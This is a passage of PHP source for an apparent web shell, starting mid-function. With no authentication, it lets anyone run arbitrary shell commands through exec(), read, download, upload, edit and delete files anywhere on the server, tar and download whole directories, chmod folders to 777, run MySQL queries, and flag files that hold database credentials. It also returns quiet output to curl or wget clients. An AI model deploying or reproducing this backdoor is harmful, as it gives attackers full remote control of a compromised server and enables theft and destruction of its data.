$val) // Process '..' & '.' directories { if($val=="..") { $parts[$key]=""; $lastKey=$key-1; $parts[$lastKey]=""; } elseif($val==".") { $parts[$key]=""; } } reset($parts); $fixedPath=($isLinux ? "/" : ""); // Some PHP configs wont automatically create a variable on .= or will at least whine about it $firstPiece=true; foreach($parts as $val) // Assemble the path back together { if($val != "") { $fixedPath .= ($firstPiece ? '' : $slash) . $val; $firstPiece=false; } } if($fixedPath=="") // If we took out the entire path go to bottom level to avoid an error { $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); } // Make sure there is an ending slash if(substr($fixedPath,-1)!=$slash) $fixedPath .= $slash; return $fixedPath; } if(isset($_REQUEST['chm'])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { echo (@chmod ($_REQUEST['chm'],0777) ? "Reassigned" : "Can't Reasign"); } } elseif(isset($_REQUEST['phpinfo'])) { phpinfo(); } elseif(isset($_REQUEST['dl'])) { if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true) { $_REQUEST['dl'] .= $_REQUEST['file']; if(substr($_REQUEST['dl'],0,1)==$slash) $fileArr=explode($slash,$_REQUEST['dl']); header('Content-disposition: attachment; filename=' . $_REQUEST['file']); header('Content-type: application/octet-stream'); readfile($_REQUEST['dl']); } else { echo $_REQUEST['dl']; } } elseif(isset($_REQUEST["gz"])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { $directory=$_REQUEST["gz"]; if(substr($directory,-1)=="/") $directory=substr($directory,0,-1); $dirParts=explode($slash,$directory); $fname=$dirParts[(sizeof($dirParts)-1)]; $archive=time(); exec("cd $directory; tar czf $archive *"); $output=@file_get_contents($directory . "/" . $archive); if(!$output) header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); else { header("Content-disposition: attachment; filename=$fname.tgz"); echo $output; } header('Content-type: application/octet-stream'); @unlink($directory . "/" . $archive); } } elseif(isset($_REQUEST['f'])) { $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); header("Content-Type: text/plain"); fpassthru($file); } elseif(isset($_REQUEST['d'])) { $d=$_REQUEST['d']; echo "
";
    if ($handle=opendir("$d"))
    {
        echo "

Listing of "; $conString=""; if($isLinux) echo "$slash"; foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)

(gzip & download folder) (chmod folder to 777) (these rarely work)
"; while ($dir=readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents,"mysql_") || stripos($contents,"mysqli_") || stripos($contents,"SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; // Some configurations throw a notice if is_array is tried with a non-existent variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); echo "
"; } elseif(isset($_REQUEST['c'])) { if(@ini_get('safe_mode')) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } $USER_AGENT=strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4)); $SILENT_MODE=TRUE; if ($USER_AGENT != "curl" && $USER_AGENT != "wget") { $SILENT_MODE=FALSE; echo "

Command: " . $_REQUEST['c'] . "



"; } trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { if ($SILENT_MODE) { echo htmlentities($val); } else { echo '
' . htmlentities($val) . '
'; } } } elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path=$_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path=$target_path . basename($_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'],$target_path)) { setcookie("uploadDir",""); echo "The file ". basename($_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>
Submit this form before submitting file (will open in new window):
Upload Directory: ">


Upload file:
The following query has sucessfully executed" . htmlentities($mquery) . "

"; echo "Return Results:
"; $first=true; echo ""; while ($row=mysql_fetch_array($result,MYSQL_ASSOC)) { if($first) { echo ""; foreach($row as $key=>$val) { echo ""; } echo ""; reset($row); $first=false; } echo ""; foreach($row as $val) { echo ""; } echo ""; } echo "
$key
$val
"; mysql_free_result($result); } else { echo "Query Error: " . mysql_error(); } } elseif(isset($_REQUEST['df'])) { $_REQUEST['df'] .= $slash . $_REQUEST['file']; if(@unlink($_REQUEST['df'])) { echo "File deleted"; } else { echo "Error deleting file"; } } elseif(isset($_REQUEST['ef'])) { ?>


Server Information:
Operating System:
PHP Version:    View phpinfo()


Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:

Execute MySQL Query:
host
user
password
database
query

Execute Shell Command (safe mode is ):